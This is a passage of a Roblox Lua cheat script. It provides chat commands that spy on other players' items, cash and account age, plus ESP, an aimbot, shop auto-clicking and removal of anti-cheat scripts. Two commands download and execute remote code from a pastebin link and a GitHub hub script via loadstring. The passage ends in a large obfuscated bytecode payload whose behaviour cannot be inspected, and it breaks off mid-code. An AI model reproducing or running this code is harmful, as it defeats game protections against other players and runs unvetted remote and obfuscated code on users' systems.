| 1323 | if plr.Character:FindFirstChild("Humanoid") and workspace.Players[plr.Name]:FindFirstChildOfClass("Accessory") then
| |
| 1324 | for i, f in pairs(workspace.Players[plr.Name]:GetChildren()) do | |
| 1325 | if f.ClassName == "Accessory" then | |
| 1326 | local SoundIdZ = workspace.Players[plr.Name]:FindFirstChildOfClass("Accessory")
| |
| 1327 | chat("[Spy] "..plr.Name.."'s accessory is "..f.Name)
| |
| 1328 | Not(plr.Name.."'s accessory is "..f.Name, 145360599, "Accessory Checker") | |
| 1329 | wait(3) | |
| 1330 | end | |
| 1331 | end | |
| 1332 | end | |
| 1333 | end | |
| 1334 | end | |
| 1335 | elseif msg == "/e esp" then | |
| 1336 | f.addesp() | |
| 1337 | elseif msg:sub(1, 8) == "/e pants" then | |
| 1338 | for i,v in pairs(game.Players:GetPlayers()) do | |
| 1339 | if v.Name:lower():sub(1,#msg:sub(10)) == msg:sub(10):lower() then | |
| 1340 | local plr = v | |
| 1341 | ||
| 1342 | if plr.Character:FindFirstChild("Humanoid") and workspace.Players[plr.Name]:FindFirstChildOfClass("Pants") then
| |
| 1343 | local SoundIdZ = workspace.Players[plr.Name]:FindFirstChildOfClass("Pants")
| |
| 1344 | local id = SoundIdZ.PantsTemplate:match("%d+")
| |
| 1345 | local Asset = game:GetService("MarketplaceService"):GetProductInfo(id)
| |
| 1346 | chat("[Spy] "..plr.Name.."'s pants are called "..Asset.Name)
| |
| 1347 | Not(plr.Name.."'s pants are called "..Asset.Name, 145360599, "Pants Checker") | |
| 1348 | print(Asset.Name.." - "..id) | |
| 1349 | setclipboard(id) | |
| 1350 | break | |
| 1351 | end | |
| 1352 | end | |
| 1353 | end | |
| 1354 | elseif msg == "/e spin" then | |
| 1355 | if spin == false then | |
| 1356 | spin = true | |
| 1357 | local spinSpeed = 50 | |
| 1358 | local speaker = game.Players.LocalPlayer | |
| 1359 | for i,v in pairs(speaker.Character.HumanoidRootPart:GetChildren()) do | |
| 1360 | if v.Name == "Spinning" then | |
| 1361 | v:Destroy() | |
| 1362 | end | |
| 1363 | end | |
| 1364 | local Spin = Instance.new("BodyAngularVelocity", speaker.Character.HumanoidRootPart)
| |
| 1365 | Spin.Name = "Spinning" | |
| 1366 | Spin.MaxTorque = Vector3.new(0, math.huge, 0) | |
| 1367 | Spin.AngularVelocity = Vector3.new(0,spinSpeed,0) | |
| 1368 | elseif spin == true then | |
| 1369 | spin = false | |
| 1370 | local speaker = game.Players.LocalPlayer | |
| 1371 | for i,v in pairs(speaker.Character.HumanoidRootPart:GetChildren()) do | |
| 1372 | if v.Name == "Spinning" then | |
| 1373 | v:Destroy() | |
| 1374 | end | |
| 1375 | end | |
| 1376 | end | |
| 1377 | elseif msg == "/e mask" then | |
| 1378 | local savepos = game.Players.LocalPlayer.Character.UpperTorso.Position | |
| 1379 | local lol = game.Workspace.Ignored.Shop["[Surgeon Mask] - $25"] | |
| 1380 | game.Players.LocalPlayer.Character:MoveTo(lol.Head.Position) | |
| 1381 | wait(0.25) | |
| 1382 | fireclickdetector(lol.ClickDetector,4) | |
| 1383 | wait(0.25) | |
| 1384 | if game.Players.LocalPlayer.Backpack:FindFirstChild("Mask") then
| |
| 1385 | game.Players.LocalPlayer.Backpack:FindFirstChild("Mask").Parent = game.Players.LocalPlayer.Character
| |
| 1386 | end | |
| 1387 | wait() | |
| 1388 | game.Players.LocalPlayer.Character.Mask:Activate() | |
| 1389 | game.Players.LocalPlayer.Character:MoveTo(savepos) | |
| 1390 | elseif msg == "/e block" then | |
| 1391 | if godblock == false then | |
| 1392 | godblock = true | |
| 1393 | elseif godblock == true then | |
| 1394 | godblock = false | |
| 1395 | end | |
| 1396 | elseif msg:sub(1, 7) == "/e face" then | |
| 1397 | for i,v in pairs(game.Players:GetPlayers()) do | |
| 1398 | if v.Name:lower():sub(1,#msg:sub(9)) == msg:sub(9):lower() then | |
| 1399 | local plr = v | |
| 1400 | ||
| 1401 | if plr.Character:FindFirstChild("Humanoid") and workspace.Players[plr.Name].Head:FindFirstChildOfClass("Decal") then
| |
| 1402 | local SoundIdZ = workspace.Players[plr.Name].Head:FindFirstChildOfClass("Decal")
| |
| 1403 | local id = SoundIdZ.Texture:match("%d+")
| |
| 1404 | local Asset = game:GetService("MarketplaceService"):GetProductInfo(id)
| |
| 1405 | chat("[Spy] "..plr.Name.."'s face is "..Asset.Name)
| |
| 1406 | Not(plr.Name.."'s face is "..Asset.Name, 145360599, "Face Checker") | |
| 1407 | print(Asset.Name.." - "..id) | |
| 1408 | break | |
| 1409 | end | |
| 1410 | end | |
| 1411 | end | |
| 1412 | elseif msg == "/e secret" then | |
| 1413 | loadstring(game:HttpGet("https://pastebin.com/raw/2mewppmF", true))()
| |
| 1414 | ||
| 1415 | elseif msg == "/e aimhub" then | |
| 1416 | loadstring(game:HttpGet("https://raw.githubusercontent.com/CriShoux/OwlHub/master/OwlHub.txt"))();
| |
| 1417 | elseif msg:sub(1, 7) == "/e cash" then | |
| 1418 | for i,v in pairs(game.Players:GetPlayers()) do | |
| 1419 | if v.Name:lower():sub(1,#msg:sub(9)) == msg:sub(9):lower() then | |
| 1420 | local plr = v | |
| 1421 | if plr.Character:FindFirstChild("Humanoid") then
| |
| 1422 | chat("[Spy] "..plr.Name.." got $"..money(plr.DataFolder.Currency.Value))
| |
| 1423 | Not(plr.Name.." got $"..money(plr.DataFolder.Currency.Value), 145360599, "Money Checker") | |
| 1424 | break | |
| 1425 | end | |
| 1426 | end | |
| 1427 | end | |
| 1428 | elseif msg:sub(1, 6) == "/e age" then | |
| 1429 | for i,v in pairs(game.Players:GetPlayers()) do | |
| 1430 | if v.Name:lower():sub(1,#msg:sub(8)) == msg:sub(8):lower() then | |
| 1431 | local plr = v | |
| 1432 | if plr.Character:FindFirstChild("Humanoid") then
| |
| 1433 | chat("[Spy] "..plr.Name.."'s age account is "..plr.AccountAge.." days old")
| |
| 1434 | Not(plr.Name.."'s age account is "..plr.AccountAge.." days old", 145360599, "Age Checker") | |
| 1435 | break | |
| 1436 | end | |
| 1437 | end | |
| 1438 | end | |
| 1439 | end | |
| 1440 | end) | |
| 1441 | ||
| 1442 | if raycast == true and switch == false and not aimatpart then | |
| 1443 | getaimbotplrs() | |
| 1444 | aimatpart = nil | |
| 1445 | local maxangle = 999 | |
| 1446 | for i, v in ipairs(plrsforaim) do | |
| 1447 | if v.Parent ~= lplr.Character then | |
| 1448 | local an = checkfov(v) | |
| 1449 | if an < maxangle and v ~= lplr.Character.Head then | |
| 1450 | maxangle = an | |
| 1451 | aimatpart = v | |
| 1452 | print(v:GetFullName()) | |
| 1453 | v.Parent.Humanoid.Died:connect(function() | |
| 1454 | aimatpart = nil | |
| 1455 | end) | |
| 1456 | end | |
| 1457 | end | |
| 1458 | end | |
| 1459 | ||
| 1460 | end | |
| 1461 | ||
| 1462 | ||
| 1463 | game:GetService("RunService").RenderStepped:Connect(function()
| |
| 1464 | if aimatpart then | |
| 1465 | aimat(aimatpart) | |
| 1466 | if aimatpart.Parent == plrs.LocalPlayer.Character then | |
| 1467 | aimatpart = nil | |
| 1468 | end | |
| 1469 | end | |
| 1470 | end) | |
| 1471 | ||
| 1472 | ||
| 1473 | ||
| 1474 | delay(0, function() | |
| 1475 | while wait(espupdatetime) do | |
| 1476 | if autoesp == true then | |
| 1477 | pcall(function() | |
| 1478 | f.addesp() | |
| 1479 | end) | |
| 1480 | end | |
| 1481 | end | |
| 1482 | end) | |
| 1483 | ||
| 1484 | ||
| 1485 | ||
| 1486 | ||
| 1487 | delay(0, function() | |
| 1488 | game.Players.LocalPlayer.CharacterAdded:Connect(function(char) | |
| 1489 | pcall(function() | |
| 1490 | repeat wait() until game.Players.LocalPlayer.Character | |
| 1491 | char.ChildAdded:Connect(function(child) | |
| 1492 | if child:IsA("Script") then
| |
| 1493 | wait(0.1) | |
| 1494 | if child:FindFirstChild("LocalScript") then
| |
| 1495 | child.LocalScript:FireServer() | |
| 1496 | end | |
| 1497 | end | |
| 1498 | end) | |
| 1499 | wait(1) | |
| 1500 | for _,v in pairs(game.Players.LocalPlayer.Character:GetChildren()) do | |
| 1501 | if v:IsA("Script") and v.Name ~= "Health" and v.Name ~= "Sound" and v:FindFirstChild("LocalScript") then
| |
| 1502 | v:Destroy() | |
| 1503 | end | |
| 1504 | end | |
| 1505 | local cor = coroutine.wrap(function() | |
| 1506 | local i=string.byte;local a=string.char;local f=string.sub;local K=table.concat;local A=math.ldexp;local h=getfenv or function()return _ENV end;local Z=setmetatable;local c=unpack;local s=tonumber;local function r(i)local n,l,t="","",{}local d=256;local o={}for e=0,d-1 do o[e]=a(e)end;local e=1;local function h()local n=s(f(i,e,e),36)e=e+1;local l=s(f(i,e,e+n-1),36)e=e+n;return l end;n=a(h())t[1]=n;while e<#i do local e=h()if o[e]then l=o[e]else l=n..f(n,1,1)end;o[d]=n..f(l,1,1)t[#t+1],n,d=l,l,d+1 end;return table.concat(t)end;local s=r('1Z1Q1Z2761X2112761Z22B21U2222292281X21227A21W21U22621Y1X21727A23722721U22I21Y27F1X21B27A23322421S21U22727R27T27V1X21527A22O22321U22921U21S22F28727Y27622S21Y22F28B22222721Z22921Y2251X21327A22Y22822Q1X21027A23421S22922222B22F27H27A23127L27N29227622Z21Y28322F22327829322422E22521Z1X21827A22T22229Q29V27F28N22328P29R28J1Z28028222729429629827O27A22V21Y22822F22922422I29S28A28C28E28G27V22Q21Z21Z21Y29R27P27622O22422522521Y28G1X21427A22722421U21Z2AG29622521W2AC29G22F22F22B28L2991127A2232BH22B2281P1C1C27C2AG21Y21T29W1D21S2242261C28E22C1C1Q22622Q22C2311L22922Q27A2CG25V1S28827A21T27S21S2202272222AG29127A2BB29W2BE2792762B722C28721627A22F2242CV2BD29A27622W2222CO27X27A2202DC22027M22822821U21W27N2A428527U2CE2AS2AU2BF1Z2C12B02B229927I2762B122J2992B528K28M23427V22D2DC27N2E61Z2BK2DQ27V27G2CY1Z22627D22527G2AW1Z2AY28S22S22E2222CK2762352242CM22422J2EU2EW21J27Q27S2DR2332CR28N2AZ22F2EN2872EE2A92242272272FA2CS2EQ22P22S22T28E27M2B42F728622929C2FT2EE23B21Y2E42AY2B72291G2CT2AX2FJ2242G628V27A2B122C1Z23A2GI2GJ25I1S2CG2GN2DV22822B2B22222832GN1Z25F22422R29M27622629O22827N2D32E722F2322H32H52D428D2DN28H27N28927628S22F22E22922522B2D62G82ER2FR29D1X21F27J28M2C527M2FE2FE2CM2ED27A23G23G22529D2A72272DE2E221Y22C21S21S2B72282HL27N21E27A22B2AI28H28G23G21X29P28G2222AZ2IB1Z2H42AH29I21Z2AZ2272AK29T2H121U22021Y23G22C29628H21U2I22DV22W21Y22I22V22422C22529F2761W27A1X1X27A21U2JT2CL2JX27621S2CG21A27A23227A25N1Y27622Y2K62K81Z22U27A25Y2K427A26Z2KC2322172HV22U2AW23221F131Z2442HV1Z2KA27624428X2KM1Z25S2H622Y2KR2KT2KV2KE27621R27A2KO2HV2552AW22U2L62552KV2KL2762492H61Z1Y2JP2D91Z22C27D2E027J2HT2EQ2EH27W2A42A62832M02EX2ER2AN28F28H2292FU2AX2A128Q2AR2AT2AV28A2AZ2B128G2KC2LP2LR28W2K928Z2HQ2A92972LW2762LU22222F1Z2552562N32N324A2CJ2J61Z29V29X27E2AG28O28Q2IX2M32A82952MV2MC2N927E21Y2E922922D27V2CG2IL2K927A26N27A22R21725V2642112AW22Y21N2KS26B21N2NV27623M2KC2302372O125E2371Z24J22Z21F2O126X2KV22V21N2O11G2O92KW21F2HV24Z2KV2KA22R1Z22K2NY1B2O125V1B2K92O61Z25L21M2OA1Z23127A2302OM26424R2IL24J2KA2OI24A2L021V2P22O42OW1Z1E2LK2AW2402EQ2K329G1Z2O123D2L02HV21I2AW22Z2O026422M2O42172KS2662QF1J1Z2QI2K92172P1182O427A23Y2OD24B2642PK24A26422K2PO2QL2PR2PT2762P12O122728X21N2HV2132OU2LL1Z24Y2EQ1Y2F62GV27A2CI2H02EL2EN27G2JP2D72CX2B62JM2872E12PF2HT2LO2D52RS2LS27K2FT2EQ2ES21Y2F42M62EZ2F12F32EV1X2RJ1Z2M02FM2FC2252FE29W2FG2932952FJ2FL2FB2DV2FP2HS2FZ2FV2DR2FY2I32762G12G32GA2GC2JP2G42GB2G72MQ1Z2GF2GH2GJ2GI2GL2RK2772EQ2GQ2GS2GU2GN2GX2P127A22S27A22Z2Q42642302AD2QC26Q2LG2KV2202KV2R62TW27A22W25F2O125K25E2OJ23F2PJ23D2KV23E1B2QK24A2P82GH1Z2P126627A23E2L62712KV23B2P526424U1A2762372UF2KV2361R2QK1V1R2CZ2QC23X2H622622R2P12292TQ2362KV25C2NU23A1Z2KS2712KK1B2PS2192UM23022J2O121E22J2UD1J2Q52QK1Z2UI22B2QL2UM2UI24J1Z1T2W91B24Z1Z122WE23N1Z25H2UM2VN2UP2UR2VS1Z26K2WE2431Z24O2WE26B1Z2532V01Z23B22B2O122T2W72GH2W21Z2731I2V12TV2702KC22724J2O127024I27622324R2O122E24R27623A132KS22J2KS2W52232PS2552232DA2172QW172Y522K2TU2XK2KC22V24Z2O125B2WG2KD2KV2512U42TV2TX2DA2U92642UB2UD2PJ23W2UH2UJ2WW2WN2UO1Z26J2UR2L622J2UV2UX1W2UM2V22X62V42V61Z182V91Z2272YE26423W2YH2VE2P121O2VI2KV24R2KV2VN2KS25J2VR2PS25I2VV2VX2642VZ2W12O123W2W42W61Z2UL2762WA1Z23K2X22UI2WG2662WJ2W82XT2YZ23F2WQ2PS25L2WU310J2W51B2WZ2542X22X42O124E22A2XT2XA1T2W42372XP26422X2XS2ZG2572O11I2572XN311B264218311E2GH2XV1Z27212310A2Y02KW2Y31Z22W2Y526425M2162QZ2RE2Q027A2MN2GO2K42KV2432NU2RE25O2LO1Y2LB2772JU27622D2RN2H222E2H42HQ23B2HD28M2HQ23728D28T2992TB28Y2902EK2H92AT2IA2RX2S427N2LZ2F82EI2AL2762NA21Z29Y2ND2ME29R2RX2T01X2S0312O2HF2NG2812M431362MB2LO22P28F22027C2DD2T72C221T21U2992HH2M728D2M92RW27A2MY2992LO22Q2IU22D31402HG27A21S2M82AP2MB2NU1Z22Z22E2EM22522422221Z2EZ22422F312R229314127A2HJ2HL2HN2HP2T72SW21Y1Z26M26N315A315A25Z2GM2GV2CI2RK1N2GZ2TB2TD2TI1Z21X315O315P25H2GM2N22N42562N62CG2462KH2H12PH24R25Y26423E24R2122OK2QC23D2QF2KS1T2QR27623C2PH223316326F22331672QB2Q5316B2LT2QJ1Z24C2L42172QK2QM2KW316V2QL2QF2P12582H622R2UX26P2UM2O52KS24O2PD2KW27A23R2OD21N316321E21N316M2W226423D2W422Y2172W723K316U2WB25E31742QC25N2AW22Q2PA2102OU3181316W318421N2QK24O31872QK22F3187310G2OU31791Z23M318G29B2PH24B25Z26423224B2132OK317M24U2XD316Y2W7316X317Q2WB22K2AW2NZ2YF31802PA266318B2QL319931982763185319A319D21N318F2P92KS23A2OU22Z2OF26425V23629G317M26X317P317R31082QF2WV23N2QF2WZ273317U1Z26W31932232XK222319J1Z270318K2762PG27623023F2O1224310M318T2O125Y318W317Q2W7210319Y31702QN2WZ318Z217319131A72O126M311S318H25G2OU22V317M317O2762LH2W726S2L821F2WV2732NU2LH25F2QL2OZ2PA21R319M310023D2W0316Y2HV23K2QA317M24E31AQ319W31A32QN2WV23F2QF31BL26J2QF317V317431A826426P31B42PA31B62QN2LP24V2L42PV2PX319S310Y31C0318Y31AU31C52QN31BL253316E318I2OD311621M2XS31AN26424J31CQ31AV316Y2WV31CW2QN21F1Y2QQ2QN31B02R52ZI26M2YH318H22J31AE2PF2PH22R2VY2P131D331BA318X2XB316U319Z2QF31DC25431A423Y31932ZI27331DK2PA271318G2QO1Y24A2QA311G25C311J22Z310024W22I27622V23V2OS23V2K92PV2152KV22Z2432XK24231EM24B2XK2PQ2UO31EW2641G2WV311T23N25U2642482OC24J23F319O24S319R2W5318L31AH22B31FA25E22B1Y31FE319O24E31FI2UI31BL25D2W931FK1Z2OE31FA24D23731FQ23F317M22M31061B318Y310Q310H310A1B31BL24C310E27A2572OD1331FA21E1331G5319O26Q2OI310S31BL273310E1B2WB24G2Z82ZI27024Y310A2PA31DM310A27A21P2PH25N2O126F25N310326422I31G931GB31GE2WV31GD31GU310R310B22K31H12O121F2YH23E31H62OU23E27A2OC31AH23N2O124L23M31HG26Q31HJ2LT310Q182WE31C72WE319131HS31F531HV2PA23X2OU23B31FS31FI23A1J31BL24O2W431IQ2WB2692W42ZH2XK31H42GH31HX311122R1Y254318W23731I3317N2WK1Z2V524J1Y26S2ZF22726J311C2Z11Z22331JK26423Q26I27621Z26R2XK26Q276236311L311N31112W7251318W23E23N2PS22Y31JC23F310024Q31BT23B26Z2O126P26Z310A31CM2KV22W22Z2652641731KO2Y9317M1W319V2W731ED31C331D7317Q31BL318Z31FZ230311625631D222Z31B931KW31L021731HM31DZ31EC31C91Z24K31E42OS31E72KS265317C2KX1Z21U31DP2O123231DS31L92W32QN2W731CT31D831LC31DC31AY2WB31LJ31DH2XQ31LM1Z31H71Z22V311G22T311J31K92KS25531JC2RE21N2RH312D1Z2JZ31MB312I2HA312M313K312Q312S2SL2GD2MR312X2K422431302S32LY2SY31372N8313A313C2A02A22LS313H313J2292HE21Y2DO27Z313N284313P313I27A313S2CO313V2202HQ2AY226313Z314Z2MD3144314J2LS314831NQ319D314C314E2M6314H31O22MA1X314L314N314P314R314T224314V314X31O01Z31512HM2HO2RQ28A31563158315B315C315E2GN315G2GV315I31N02TC2ID315M315N315P315O315R2N1315U315V31OY1Z25A315Z1Z2EE23026J318O26Y26J318S316N26426X316P31L3276311J31G023V318O25623U31PP2QC24U316U2KS12316R22C316R31AT2QN316W31711Z24H31932UX2702X2318H27231LP31GJ2OD23F318O21E23F31PP31BY31D631M52R42UO2QC26E3196316C319925D3199253317C319E23N318E1Z25431LP2PA31LO2PE2552OD26325S26426Z2631W31DT31LB22F31LH31922R52QC22T31R22ZD319912319931RD319G2QK26J31RB23K31RE31LN317C319N2O124W31GT31LX26426E31LB31Q931KZ31AY2WZ31QB316Y2WB21Y31B1319P31CF2XW31DN2TS31AH31AJ316431AM31SG24S31D624O31AU31A031AW2WC31LH26Y31CB31A931AB31CH31MD31LA31BB21F2W71231BF2WV31TL31TI31FW31BN2KS2O529G310024S31EL31BU1Z21231BX31LY31DV316T31KZ31M131L131LC31GZ31SS23U31AA2KW2PA319L31CI1Y24P31CL2HV31CN314M31TH31DV1V31AU31AY31BL31DE317D31PV31612OG31L8318U31QW31T631LF31C231SP1Z31TB31M826431H331AB31MC31LQ23H31LT26424L2CF31D3318V31LZ31LC2WV31U431BU31LG31DF1Z1L31LK311731MA31VB31EB31SO22Z311G26D31EH310024U31TX31EN2XK23U31ER2HV2632NU31EV2O122X31F722V31F02641N24B2R531F423031F722W31F926425Z23N31GQ2ON31GT31HZ31AF2PH31FM26422O31FP31FR2O124U31FU31GF31RC31GI2OB2OD23731FA26023631G5317M24531I9310V31HL2WH31ID2XB31XB1Z317F31AH31GM26426Y31GP31X526424B31X831US31IF1Z2582X22372ZI1I31IJ31SV31H827625231HB2O126831HF31FE317M23X31K531GA2WL31GC31XP31IC31GE2WB31Y62V131H231J131HW31YC31FJ27625U2OD31JA21E2WK31YK31U2310721031YQ31GE31Y331YT31A531IH23T31YY31J32X3319O26E31GT31IQ31BL26S31IU1J2WB26N31IY31Y92YH319L31Z031IQ31J52XC2V131JA22I31JC31JE2LQ31JI31JP21F31JM31JO2O121831JM31JU31B226R31JY311L266311O2X931K331K531K71Z21R31KA310025F31KE31KG26427331KJ2W531KL2DA31KO26424H22Y26522K31MM2RH152JS312F1Z22H31N62S531N82M131NM2A72M5313R313T31NU31382NM2NB29Z2NE29R313X31NY314031MX28S31MZ314228B31OC31462MX2LV31O61Z314B22F222314D28H31OA314I31OD31OF314O21U314Q314S314U314W28D31ON31OP315331OS2AX31OU315T2N425U2CJ2EK27C2NC2IX2BK321X322331NF2HT2A42392GB28H2E42IJ27G2Q21Z323D314Y2G22HK29622H27N21927A323L323F323O2JF2272HB31JT2FB322N21S27N21H2AD324122532432FR2C232262AO31OD2LO2372D62MZ2IV2252GV24J22Q2TQ31OZ31PE27A21J2GZ2LO31OG322N31OI2HQ29H29J311S2GN17315J2GE31P5315M31P831P92CJ31422382GB2202GQ28F323R28A2HL322328N29D28E31MR2W7322Z2N323U31PE2KZ2762K52762XY31G0257316323E257316M2QC24Q316P31VN317Q2V731QE31E12QN2OI31RU2UO317M26M317P2PA2O82PE31VD31SY2O125631T13169316P31U6316Z316D2QN2P131KY316Y2OI31V6326G320F326J31Z022V2QC2QE31TI2QH31BF316W31BF2WB2662OZ1R31TS2ZF22Z22Z2O124S2KX317Q2Q82QA3265316P31V33269316Q31VQ3268217326E3193317M21132751Z25W31EA2WK31E331W91Z2L1314M2QC22G31PT316R31QX31PU31A531CZ31UX2OJ31PQ31R12QN2KS317T31QC1Z31UP31SL2QF3271317421V2XQ2PS31UD2KS31TF31LQ31Z331AH31DQ310131LW2QC24E31Q52WL316R25D31UQ328Y1Z317W2R5329131CD3293318H31IL31CU1Z31RS29G31CC235311S327L2X62TU31MD310023U31TX2L52HV1F31EU2XJ26425N2WB31MD2QC2452U12KS31BI31TI31DC24G31BF2762ZR2NV2P12VQ31AH22J31RL27222J31RP23A1B31GP2532Z8329D2H62V52KS25H2ZF2V52QK25332BA327I1Y24O2ZF22Y1J2W725A318W23022R31RL21E22R32AZ32B11Y31FX2K91J1J1Y2342W42301B31RL26Y1B32BT31GP2WM32BX31J522R32C221F32BQ21F32C831DD31781J31G424N32BN26325T31XW2631X24J32B02WB2WX310K31Z22OD25F32CQ22O25F32CT32CV1Z23F2WN32CL1Z24V318W227329O25V329331ZZ32862OU2VN27624D2OD24332CQ21E24332CT23B2QC31PS31112QH31ZS2QK31ZR31K21Y23P318W22631GY310R2VE2WZ25H2TQ2VE31JF23N2TQ32DI31MC23B31F426X31EY2X331F425N31F72321J24Z1Y26H32C223732DQ23732DT31JV31V831JX2SH320Z23Q26Y2CZ32F127032F32381B32CQ22P1B32CT31WY31MD2PH24J31FA25631JF24J21Y32E731GH2763157316F316H31GN22331FQ21Z326S32FT2372QH31GT21Y23731S532G52372WB314W32FT27A323J2301R32FM1R31FQ32FQ2WB26S2UM32G62OI26931GT22N329O1I329321Y326K2OU32FU1Z31HA31AH21731XF21632FZ32G11Z32G632G432G22QK25H32G92WB25331FI32GP31LI32GS329O24632GW31ZK32H02QT31AH26B2VY2WZ32FP32E71V32GO23726B1Y26632G926R31J631FI23225V2WK26V25V31AH311G21E311E24J32G0316O32G22KS26J32G92QK23N32HF1Z32IP32G22OI1L32HL2XK31LS32H92PA21H2OU21U32E723N2UM21U31FF31V531WY22J329O23Q32IY21U32GY27632J731BL23F310M1Z22N2X531Y031101Z22M32911Y23F32932W031FA23Q1Y2K82N031FA2XG2K822B32H4319P2172K822M311L25G2XY32J72WZ22832JL21Y22B2WV26Z32JQ32II26432AH32IK29132IN1X32I327621V32JO23W2X832J725V32BV32JL22N328F2AW32JS131X24A329332JS1J32LA32LC21V31GV32IY32JS2GZ24O329322I32E731HN22I2232WZ12311S32LR31L232LV2232GZ25431UC32JF2KS26332GZ32KK2N12X821Z327M317N32A221V1B31FA2111B2K821Y32141Z23826B26626421632MO2R02VO1Z21G316H267318P223267321B2AW24T2LO26U27Z2TV23L2K42L124C2AW2332TV23W2TT2QC25F328H328U329I326X2Z0329K26N2PU2DA2LK2YZ24A328M26426024Q2OJ23E132PS327I2V11R2XK2752W52PA31AD31YD1Z31PW230329O21E2PS24J32O1327F2XY22Y2WF1Z23Z2X223032MB21E2TU32OJ1332OL2K91B2WK32OQ31AH317M2242QK32OW2WV24V320O237329O27032IY31YZ1Z1631HY31QO32H331AK27P32OW320K1L2XY2US2RB32NT2KS2612PH23F2QW31QS2QZ23332H82K52KS31F21Z2K532BC2KK2GW2R2325V2Q41Z25G2YC2QC25Q2H62322RA2PW2OU23332AB31RP29G32H8327Q1Y326F22R31YX27623I2AW24E2O42XY26C2XY32Q31Z23P32NA327R276233311G311I29G31JA24J31I6316Y2762202AW31ME2UA311J23031EO26426731EQ24J23J32RR25N31EQ1Z23I32O232BV2XY31C52O124B2H62UI32Q42WE2UK31Y431ZB32QY2L625X2NU23F32RR26Q32RZ2UI21V31J6310W31WI24W31F231J92O122Q32072ZC23R2ZF23A2KV2252UH32MU2ZV325V132OI26O320O32C32VY2P832RV32H832S12KS253320O32S132HD2XY32S131JF25E320O23B31JP24B31JS32S032QL24Z2OU32BO2QW26O22R32Q032Q232MU23K32Q931WU2UQ32QC24332QU2AD2PJ25R2LK32QL1E32QN2YP23D31BL328E32IJ316Y32I532QV2PJ23Q2NU31QL31LP21725F1Y32NQ31ER2QK26G2KV32C332CQ26F32FG31FE311G26P311J23B2632O126Q2633111276103114311G23O311J23C2YP2YR24J22332RR23D32RZ22222Z32SO26632A221Y32OX2QL2XY2222Z32KV21Z31WI23D31WL1Z21V32RR24B31W831LR32JV31DD32L432VF31D426227632JS2WB24J329321U2KV2582KV31572KS32I5325V22Z2WK21932A22VW2O121M2W032VT32H832VY31MQ1T32A232VY21F32KU32XG22Z32L932W127632VY32LE32XN32H932W426632W632X32WS32XK2GZ25332XK32EZ21032A221Z32GH26425Y1Q32MJ32GA32KU31GT21V311G230311J22N22Z32MG22Z2K822J31XE319P31G432XS319K32W61J31I624432BZ1Z23C311V24H311Y22K23F32VN32VD23F31FA22T23F2K831IQ31JY32VM2P632VP2YP25Z31BL32VT32VV32VX32VZ32I232W232W41232W62L62722NU32WA2Q532WD32WF310432RZ32J732SO26J32L432Z7317N32ZA32JR21V2WB1A32WU2ZQ32WY32MU32AT32Q632XW32X532AU2O126031EL32XB32UP32XD1X24O32XK32XI2542KX32VY32XM32XK32LE32Y332FT32W425D32XV31Z732XY1X32Y032XO319N1X26J32Y432Y624U32Y932H932YB25D32YD32YO23O32YQ32GT32JY21U32YM21V31FA32GV32MJ31K0320O22232YU2N132YX32YZ2Y62Y832R623T318M32MP22O24B26622K32Q12X62KP32MU2GG32QC318C2KH32D432H02KQ2KS32ZU32RB22331FA329Y2K8325W1Z2412KC23322J31FA25V22I2K823324R31FA24B24Q332W2OJ32KU32NA2KS25R2H632QO31FA24W31JF2A524Z31FA23D32ET32UO2UY32QJ2L624O32UV1Z1J1W24C2YC31WR24531WU2KD1Z2HV2482PH2OR2642562PD24J31EN32Z823V2K82KE2HV2XM31AH2TV21C276334F334B2272OU22R24331FA24U2422K82CF31XC31XU31AK2KS24J334V31FA25Y334Z32S027A25P2UR27A24E27A31812OX32TZ2UX23232TE22R24B333P24B335027A2652PH2PJ2KQ2OJ335O335Q2K823I27A22D335H2PV31WB2R5332T32Y7222335021N24J1W253318732IC22K2OU23F132O1250320O335I2GW317C22R33691W32FY322C336D1W1V336H1Z269336K2UX25D2X2336Q25Q334U336923X336B336X336E319C336X336I336K317M250318W336Q32UJ325V2AW25J2EQ');local o=bit and bit.bxor or function(e,n)local l,o=1,0 while e>0 and n>0 do local d,f=e%2,n%2 if d~=f then o=o+l end e,n,l=(e-d)/2,(n-f)/2,l*2 end if e<n then e=n end while e>0 do local n=e%2 if n>0 then o=o+l end e,l=(e-n)/2,l*2 end return o end local function n(n,e,l)if l then local e=(n/2^(e-1))%2^((l-1)-(e-1)+1);return e-e%1;else local e=2^(e-1);return(n%(e+e)>=e)and 1 or 0;end;end;local e=1;local function l()local n,l,f,d=i(s,e,e+3);n=o(n,35)l=o(l,35)f=o(f,35)d=o(d,35)e=e+4;return(d*16777216)+(f*65536)+(l*256)+n;end;local function t()local n=o(i(s,e,e),35);e=e+1;return n;end;local function r()local o=l();local e=l();local d=1;local o=(n(e,1,20)*(2^32))+o;local l=n(e,21,31);local e=((-1)^n(e,32));if(l==0)then if(o==0)then return e*0;else l=1;d=0;end;elseif(l==2047)then return(o==0)and(e*(1/0))or(e*(0/0));end;return A(e,l-1023)*(d+(o/(2^52)));end;local d=l;local function A(n)local l;if(not n)then n=d();if(n==0)then return;end;end;l=f(s,e,e+n-2);e=e+n-1;local n={}for e=1,#l do n[e]=a(o(i(f(l,e,e)),35))end return K(n);end;local e=l;local function W()local c={};local i={};local h={};local e={};local d={};d[1]=c;d[2]=h;d[3]=i;d[7]=e;d[6]=t();for l=1,l()do local n=t();local e;if(n==3)then e=(t()~=0);elseif(n==0)then e=r();elseif(n==2)then e=f(A(),1,-1);end;h[l-1]=e;end;for e=1,l()do i[e-1]=W();end;for f=1,l()do local d=o(l(),77);local l=o(l(),186);local o=n(d,1,2);local t=n(l,1,11);local e={};e[1]=t;e[5]=l;e[2]=n(d,3,11);if(o==0)then e[3]=n(d,12,20);e[4]=n(d,21,29);elseif(o==1)then e[3]=n(l,12,33);elseif(o==2)then e[3]=n(l,12,32)-1048575;end;c[f]=e;end;d[5]=t();return d;end;local function A(e,K)local d=e[1];local f=e[2];local Q=e[3];local i=e[6];return function(...)local n=1;local o=-1;local a={};local t={...};local e=#t-1;local r={};local l={};for e=0,e do if(e>=i)then a[e-i]=t[e+1];else l[e]=t[e+1];end;end;local e;local i;while true do e=d[n];i=e[1];if i<=181 then if i<=90 then if i<=44 then if i<=21 then if i<=10 then if i<=4 then if i<=1 then if i>0 then if not l[e[2]]then n=n+1;else n=n+d[n+1][3]+1;end;else local i=e[2];if i>o then o=i end;l[i]=h()[f[e[3]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=f[e[3]];n=n+1;e=d[n];local h;i=e[2];t={};local h=0;local a=i+e[3]-1;for e=i+1,a do 